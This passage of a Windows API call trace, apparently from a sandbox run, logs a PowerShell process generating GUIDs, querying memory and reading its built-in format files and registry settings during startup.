[5]=0x1e, [6]=0x1f, [7]=0xcc))) returned 0x0 [0054.506] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x783ace5e, Data2=0x2a29, Data3=0x4d3e, Data4=([0]=0xb1, [1]=0x3c, [2]=0xdd, [3]=0x46, [4]=0x13, [5]=0xa0, [6]=0x2a, [7]=0x6a))) returned 0x0 [0054.507] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x3d583098, Data2=0xc9ef, Data3=0x4691, Data4=([0]=0xb3, [1]=0xee, [2]=0x76, [3]=0xac, [4]=0x7a, [5]=0x79, [6]=0x21, [7]=0xa6))) returned 0x0 [0054.507] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x2bb7206e, Data2=0xd018, Data3=0x4f14, Data4=([0]=0x81, [1]=0x7c, [2]=0x72, [3]=0x62, [4]=0xeb, [5]=0xb8, [6]=0xb9, [7]=0x9f))) returned 0x0 [0054.507] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x7e226823, Data2=0xf919, Data3=0x40ba, Data4=([0]=0x84, [1]=0x9, [2]=0xb5, [3]=0x75, [4]=0xcb, [5]=0xad, [6]=0x62, [7]=0x91))) returned 0x0 [0054.507] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x9e82f845, Data2=0x4d02, Data3=0x4f14, Data4=([0]=0x8e, [1]=0xf9, [2]=0xe2, [3]=0x1b, [4]=0xfe, [5]=0x3e, [6]=0xbb, [7]=0xf9))) returned 0x0 [0054.507] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xc08a8ded, Data2=0x11dc, Data3=0x412b, Data4=([0]=0x9a, [1]=0x34, [2]=0xcf, [3]=0xda, [4]=0x89, [5]=0xf9, [6]=0x13, [7]=0x4b))) returned 0x0 [0054.507] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xb0a75d18, Data2=0x984d, Data3=0x42e4, Data4=([0]=0xa9, [1]=0x9d, [2]=0x5c, [3]=0xd1, [4]=0xee, [5]=0xba, [6]=0x6f, [7]=0x62))) returned 0x0 [0054.508] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x11f6b008, Data2=0xaf28, Data3=0x4638, Data4=([0]=0x85, [1]=0x53, [2]=0x34, [3]=0x11, [4]=0xb8, [5]=0x2d, [6]=0x48, [7]=0xca))) returned 0x0 [0054.509] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xf038df37, Data2=0x8d4c, Data3=0x403d, Data4=([0]=0x90, [1]=0x95, [2]=0x5a, [3]=0xd3, [4]=0xf2, [5]=0x3d, [6]=0x74, [7]=0x22))) returned 0x0 [0054.509] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xd8570de9, Data2=0xe88f, Data3=0x42e9, Data4=([0]=0x93, [1]=0xde, [2]=0x3, [3]=0x63, [4]=0x70, [5]=0xdb, [6]=0x23, [7]=0x10))) returned 0x0 [0054.509] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x38ff894a, Data2=0x3851, Data3=0x4aa9, Data4=([0]=0xa1, [1]=0xa, [2]=0xa2, [3]=0xad, [4]=0x4f, [5]=0x9c, [6]=0xea, [7]=0x8f))) returned 0x0 [0054.510] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x7d3131a7, Data2=0xf770, Data3=0x4116, Data4=([0]=0xb9, [1]=0xbf, [2]=0x1b, [3]=0xc6, [4]=0x4c, [5]=0xfe, [6]=0xb1, [7]=0xd3))) returned 0x0 [0054.510] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xa7441972, Data2=0x1383, Data3=0x4543, Data4=([0]=0x8d, [1]=0xb4, [2]=0x16, [3]=0x8e, [4]=0x74, [5]=0x9f, [6]=0x74, [7]=0x1a))) returned 0x0 [0054.510] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x1c65aa04, Data2=0xf0ea, Data3=0x4eb5, Data4=([0]=0x96, [1]=0x6c, [2]=0xac, [3]=0xa5, [4]=0x6e, [5]=0x39, [6]=0x46, [7]=0x85))) returned 0x0 [0054.510] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x50e316d0, Data2=0x5693, Data3=0x44e5, Data4=([0]=0x87, [1]=0xd4, [2]=0x88, [3]=0x8d, [4]=0xab, [5]=0xc0, [6]=0x4b, [7]=0x22))) returned 0x0 [0054.510] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xb63c2c5b, Data2=0x6a7b, Data3=0x431e, Data4=([0]=0xbf, [1]=0xf5, [2]=0xbb, [3]=0x7a, [4]=0xea, [5]=0xb0, [6]=0x59, [7]=0x3d))) returned 0x0 [0054.510] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x6edc88fc, Data2=0x6d, Data3=0x4c17, Data4=([0]=0xac, [1]=0xd6, [2]=0xec, [3]=0xd4, [4]=0x32, [5]=0xbe, [6]=0x52, [7]=0xf))) returned 0x0 [0054.510] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x344d9841, Data2=0xa4ba, Data3=0x48cb, Data4=([0]=0xb6, [1]=0x28, [2]=0xbe, [3]=0x4f, [4]=0x9f, [5]=0x81, [6]=0x7c, [7]=0xee))) returned 0x0 [0054.511] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xeea892af, Data2=0xb14d, Data3=0x494c, Data4=([0]=0xa7, [1]=0x8d, [2]=0x85, [3]=0x44, [4]=0xa3, [5]=0x9d, [6]=0xf9, [7]=0x6))) returned 0x0 [0054.511] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xdf4fd0c6, Data2=0x1fbf, Data3=0x4725, Data4=([0]=0x9c, [1]=0x65, [2]=0xaf, [3]=0x36, [4]=0x99, [5]=0xec, [6]=0x1d, [7]=0xbe))) returned 0x0 [0054.511] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xffbccc5, Data2=0x89b4, Data3=0x4e18, Data4=([0]=0xb7, [1]=0xdc, [2]=0x83, [3]=0x8c, [4]=0xc1, [5]=0xa4, [6]=0x46, [7]=0x38))) returned 0x0 [0054.511] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xc5d61295, Data2=0xe1bc, Data3=0x4151, Data4=([0]=0xa8, [1]=0x71, [2]=0xee, [3]=0x85, [4]=0xf4, [5]=0x78, [6]=0x46, [7]=0xca))) returned 0x0 [0054.514] VirtualQuery (in: lpAddress=0x2cd6a0, lpBuffer=0x2ce6a0, dwLength=0x1c | out: lpBuffer=0x2ce6a0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.518] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xbd81e8e6, Data2=0x54af, Data3=0x4be5, Data4=([0]=0xb7, [1]=0xaf, [2]=0x6, [3]=0x90, [4]=0xd9, [5]=0x56, [6]=0xa8, [7]=0xb5))) returned 0x0 [0054.518] VirtualQuery (in: lpAddress=0x2cd6a0, lpBuffer=0x2ce6a0, dwLength=0x1c | out: lpBuffer=0x2ce6a0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.518] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xfcdbe687, Data2=0xe54d, Data3=0x4065, Data4=([0]=0x88, [1]=0x83, [2]=0x3a, [3]=0x3a, [4]=0x8d, [5]=0x42, [6]=0x1b, [7]=0xa0))) returned 0x0 [0054.518] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x195cdf3, Data2=0x9f8b, Data3=0x4bf8, Data4=([0]=0x96, [1]=0xcf, [2]=0xf7, [3]=0xb1, [4]=0x9e, [5]=0x21, [6]=0x18, [7]=0x34))) returned 0x0 [0054.519] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x8cf1d25b, Data2=0x9c76, Data3=0x476d, Data4=([0]=0x94, [1]=0x2d, [2]=0x35, [3]=0x15, [4]=0x1f, [5]=0x5d, [6]=0x6e, [7]=0x58))) returned 0x0 [0054.519] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xf9948082, Data2=0x886f, Data3=0x4e1c, Data4=([0]=0x99, [1]=0xb8, [2]=0xba, [3]=0x4c, [4]=0x7e, [5]=0x67, [6]=0xa6, [7]=0xd3))) returned 0x0 [0054.519] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xee384d21, Data2=0x25e3, Data3=0x4efc, Data4=([0]=0xaa, [1]=0xac, [2]=0x3b, [3]=0x89, [4]=0xb3, [5]=0xc5, [6]=0x93, [7]=0x67))) returned 0x0 [0054.519] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x19577355, Data2=0x51cc, Data3=0x4c45, Data4=([0]=0x8f, [1]=0xbc, [2]=0x24, [3]=0x4, [4]=0x32, [5]=0x43, [6]=0xbf, [7]=0xc1))) returned 0x0 [0054.519] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xcfdfc92b, Data2=0x62fc, Data3=0x430d, Data4=([0]=0xa0, [1]=0xe1, [2]=0xe2, [3]=0xf5, [4]=0x57, [5]=0xbc, [6]=0x92, [7]=0x8b))) returned 0x0 [0054.520] VirtualQuery (in: lpAddress=0x2cd680, lpBuffer=0x2ce680, dwLength=0x1c | out: lpBuffer=0x2ce680*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.520] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x91a87464, Data2=0x4501, Data3=0x47b4, Data4=([0]=0x9f, [1]=0x99, [2]=0xf0, [3]=0x6f, [4]=0x8d, [5]=0xe1, [6]=0x42, [7]=0xca))) returned 0x0 [0054.520] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xc9ae9bda, Data2=0x24c9, Data3=0x4199, Data4=([0]=0x9d, [1]=0x6d, [2]=0x4b, [3]=0x5a, [4]=0x28, [5]=0x12, [6]=0xcc, [7]=0xbb))) returned 0x0 [0054.520] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x7866d1b, Data2=0xb240, Data3=0x469f, Data4=([0]=0x87, [1]=0xc1, [2]=0xe1, [3]=0xb8, [4]=0x73, [5]=0x8d, [6]=0x94, [7]=0xa5))) returned 0x0 [0054.520] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xa630b013, Data2=0x48e, Data3=0x43e1, Data4=([0]=0x90, [1]=0x84, [2]=0x21, [3]=0x1c, [4]=0x5a, [5]=0x79, [6]=0x73, [7]=0x29))) returned 0x0 [0054.521] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x877b0a22, Data2=0x6216, Data3=0x483c, Data4=([0]=0xa3, [1]=0x7e, [2]=0x3c, [3]=0xe1, [4]=0xf0, [5]=0x78, [6]=0x61, [7]=0x8))) returned 0x0 [0054.521] VirtualQuery (in: lpAddress=0x2cd680, lpBuffer=0x2ce680, dwLength=0x1c | out: lpBuffer=0x2ce680*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.521] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x5750c161, Data2=0xaef7, Data3=0x493e, Data4=([0]=0xb0, [1]=0xec, [2]=0xff, [3]=0xc8, [4]=0x58, [5]=0x94, [6]=0x27, [7]=0xf7))) returned 0x0 [0054.521] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x2e81ed45, Data2=0xf9b7, Data3=0x46d1, Data4=([0]=0x81, [1]=0x75, [2]=0x1b, [3]=0x8e, [4]=0xfe, [5]=0x36, [6]=0xee, [7]=0xf5))) returned 0x0 [0054.521] VirtualQuery (in: lpAddress=0x2cd6a8, lpBuffer=0x2ce6a8, dwLength=0x1c | out: lpBuffer=0x2ce6a8*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.522] VirtualQuery (in: lpAddress=0x2cd6a8, lpBuffer=0x2ce6a8, dwLength=0x1c | out: lpBuffer=0x2ce6a8*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.522] VirtualQuery (in: lpAddress=0x2cd6a8, lpBuffer=0x2ce6a8, dwLength=0x1c | out: lpBuffer=0x2ce6a8*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.522] VirtualQuery (in: lpAddress=0x2cd6a8, lpBuffer=0x2ce6a8, dwLength=0x1c | out: lpBuffer=0x2ce6a8*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce3ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0054.522] GetLastError () returned 0x0 [0054.522] SetErrorMode (uMode=0x1) returned 0x1 [0054.522] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0054.522] GetLastError () returned 0x0 [0054.522] GetFileType (hFile=0x31c) returned 0x1 [0054.522] SetErrorMode (uMode=0x1) returned 0x1 [0054.523] GetFileType (hFile=0x31c) returned 0x1 [0054.523] ReadFile (in: hFile=0x31c, lpBuffer=0x335e13c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x335e13c*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.524] GetLastError () returned 0x0 [0054.525] ReadFile (in: hFile=0x31c, lpBuffer=0x335e13c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x335e13c*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.525] GetLastError () returned 0x0 [0054.526] ReadFile (in: hFile=0x31c, lpBuffer=0x335e13c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x335e13c*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.526] GetLastError () returned 0x0 [0054.526] ReadFile (in: hFile=0x31c, lpBuffer=0x335e13c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x335e13c*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.526] GetLastError () returned 0x0 [0054.527] ReadFile (in: hFile=0x31c, lpBuffer=0x335e13c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x335e13c*, lpNumberOfBytesRead=0x2ce954*=0x8b4, lpOverlapped=0x0) returned 1 [0054.527] GetLastError () returned 0x0 [0054.527] ReadFile (in: hFile=0x31c, lpBuffer=0x335d590, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x335d590*, lpNumberOfBytesRead=0x2ce954*=0x0, lpOverlapped=0x0) returned 1 [0054.527] GetLastError () returned 0x0 [0054.527] ReadFile (in: hFile=0x31c, lpBuffer=0x335e13c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x335e13c*, lpNumberOfBytesRead=0x2ce954*=0x0, lpOverlapped=0x0) returned 1 [0054.527] GetLastError () returned 0x0 [0054.527] CloseHandle (hObject=0x31c) returned 1 [0054.527] GetLastError () returned 0x0 [0054.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce4b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0054.527] GetLastError () returned 0x0 [0054.527] SetErrorMode (uMode=0x1) returned 0x1 [0054.527] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x337f138 | out: lpFileInformation=0x337f138*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0054.527] GetLastError () returned 0x0 [0054.527] SetErrorMode (uMode=0x1) returned 0x1 [0054.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0054.527] GetLastError () returned 0x0 [0054.528] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce8d8 | out: phkResult=0x2ce8d8*=0x31c) returned 0x0 [0054.528] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ce920, lpData=0x0, lpcbData=0x2ce91c*=0x0 | out: lpType=0x2ce920*=0x1, lpData=0x0, lpcbData=0x2ce91c*=0x56) returned 0x0 [0054.528] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ce920, lpData=0x3b8428, lpcbData=0x2ce91c*=0x56 | out: lpType=0x2ce920*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2ce91c*=0x56) returned 0x0 [0054.528] RegCloseKey (hKey=0x31c) returned 0x0 [0054.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0054.528] GetLastError () returned 0x0 [0054.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce414, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0054.528] GetLastError () returned 0x0 [0054.529] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x6d5cff03, Data2=0x1d19, Data3=0x46ac, Data4=([0]=0x9d, [1]=0x23, [2]=0x33, [3]=0x1e, [4]=0x90, [5]=0x1e, [6]=0xa0, [7]=0x27))) returned 0x0 [0054.530] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x2d29ad02, Data2=0xce8a, Data3=0x4183, Data4=([0]=0xb4, [1]=0xd3, [2]=0x31, [3]=0x2a, [4]=0xe, [5]=0xda, [6]=0xe6, [7]=0xec))) returned 0x0 [0054.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce3ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0054.530] GetLastError () returned 0x0 [0054.530] SetErrorMode (uMode=0x1) returned 0x1 [0054.530] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0054.530] GetLastError () returned 0x0 [0054.530] GetFileType (hFile=0x31c) returned 0x1 [0054.530] SetErrorMode (uMode=0x1) returned 0x1 [0054.530] GetFileType (hFile=0x31c) returned 0x1 [0054.530] ReadFile (in: hFile=0x31c, lpBuffer=0x3395048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x3395048*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.532] GetLastError () returned 0x0 [0054.533] ReadFile (in: hFile=0x31c, lpBuffer=0x3395048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x3395048*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.533] GetLastError () returned 0x0 [0054.533] ReadFile (in: hFile=0x31c, lpBuffer=0x3395048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x3395048*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.533] GetLastError () returned 0x0 [0054.533] ReadFile (in: hFile=0x31c, lpBuffer=0x3395048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x3395048*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.533] GetLastError () returned 0x0 [0054.534] ReadFile (in: hFile=0x31c, lpBuffer=0x3395048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x3395048*, lpNumberOfBytesRead=0x2ce954*=0xe98, lpOverlapped=0x0) returned 1 [0054.534] GetLastError () returned 0x0 [0054.535] ReadFile (in: hFile=0x31c, lpBuffer=0x3394680, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x3394680*, lpNumberOfBytesRead=0x2ce954*=0x0, lpOverlapped=0x0) returned 1 [0054.535] GetLastError () returned 0x0 [0054.535] ReadFile (in: hFile=0x31c, lpBuffer=0x3395048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x3395048*, lpNumberOfBytesRead=0x2ce954*=0x0, lpOverlapped=0x0) returned 1 [0054.535] GetLastError () returned 0x0 [0054.535] CloseHandle (hObject=0x31c) returned 1 [0054.535] GetLastError () returned 0x0 [0054.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce4b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0054.535] GetLastError () returned 0x0 [0054.535] SetErrorMode (uMode=0x1) returned 0x1 [0054.535] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x33b6044 | out: lpFileInformation=0x33b6044*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0054.535] GetLastError () returned 0x0 [0054.535] SetErrorMode (uMode=0x1) returned 0x1 [0054.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0054.535] GetLastError () returned 0x0 [0054.535] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce8d8 | out: phkResult=0x2ce8d8*=0x31c) returned 0x0 [0054.535] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ce920, lpData=0x0, lpcbData=0x2ce91c*=0x0 | out: lpType=0x2ce920*=0x1, lpData=0x0, lpcbData=0x2ce91c*=0x56) returned 0x0 [0054.535] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ce920, lpData=0x3b8428, lpcbData=0x2ce91c*=0x56 | out: lpType=0x2ce920*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2ce91c*=0x56) returned 0x0 [0054.536] RegCloseKey (hKey=0x31c) returned 0x0 [0054.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0054.536] GetLastError () returned 0x0 [0054.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce414, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0054.536] GetLastError () returned 0x0 [0054.537] VirtualQuery (in: lpAddress=0x2cd630, lpBuffer=0x2ce630, dwLength=0x1c | out: lpBuffer=0x2ce630*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.537] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x58d1c379, Data2=0xe8a7, Data3=0x4ddb, Data4=([0]=0x97, [1]=0x76, [2]=0x6b, [3]=0xdb, [4]=0x6f, [5]=0xe3, [6]=0xcc, [7]=0x30))) returned 0x0 [0054.537] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xe343c91b, Data2=0xc4b7, Data3=0x4157, Data4=([0]=0xab, [1]=0x63, [2]=0xcb, [3]=0x87, [4]=0xfa, [5]=0xff, [6]=0x89, [7]=0x1b))) returned 0x0 [0054.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x2ce620, lpFilePart=0x0 | out: 